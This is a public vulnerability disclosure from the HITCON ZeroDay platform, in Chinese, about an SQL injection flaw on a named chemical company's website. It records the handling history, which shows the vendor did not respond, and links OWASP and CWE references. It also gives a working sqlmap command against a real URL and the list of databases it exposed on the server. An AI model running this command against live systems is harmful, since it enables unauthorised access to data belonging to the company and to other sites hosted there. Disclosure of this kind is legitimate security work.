Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00055
- Vendor: 钧威化工股份有公司
- Title: 钧威化工股份有公司官网sql注入漏洞
- Introduction: 获取数据库所有内容
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2022/01/17 16:16:39 : 新提交 (由 SjmIsFN 更新此狀態)
- 2022/02/16 23:14:24 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/02/18 16:33:39 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/02/18 16:33:39 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/02/18 16:33:39 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/04/02 03:00:06 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00055
- 通報者:SjmIsFN (SjmIsFN)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
相關網址
敘述
sqlmap语句
sqlmap -u "http://www.actchem.com.tw/product.asp?cat=15" --batch --dbms="mssql" --dbs
结果
[] acechem-e
[] actchem-c
[] actchem-e
[] ad
[] alapower
[] alapower-web
[] art-world
[] avatek
[] bhumang-en
[] bighome-brand
[] bighome-company
[] brightcons
[] ccss-cn
[] ccss-en
[] ccss-jp
[] ccss-tw
[] chengchieh-c
[] chihtien
[] clptc
[] contechsound
[] contechsound-tw
[] diamond
[] dod-member
[] doddance
[] fongyong
[] formosapowertec
[] futai_e
[] gaupu
[] gengming
[] goodtime
[] homecenter
[] hope
[] hueyshun
[] master
[] model
[] mrcare
[] msdb
[] ok1168
[] ok168
[] pinchang
[] rdwatch
[] ReportServer
[] ReportServerTempDB
[] sanjet
[] six
[] solarwheel
[] stanfordschool
[] stroen
[] summerlove
[] summermall
[] tempdb
[] tfmdca
[] tienjiang-j
[] tmca
[] whc
[] whc-s
[] willstore-e
[] winningmedical-en
[] wollemi
[] wudu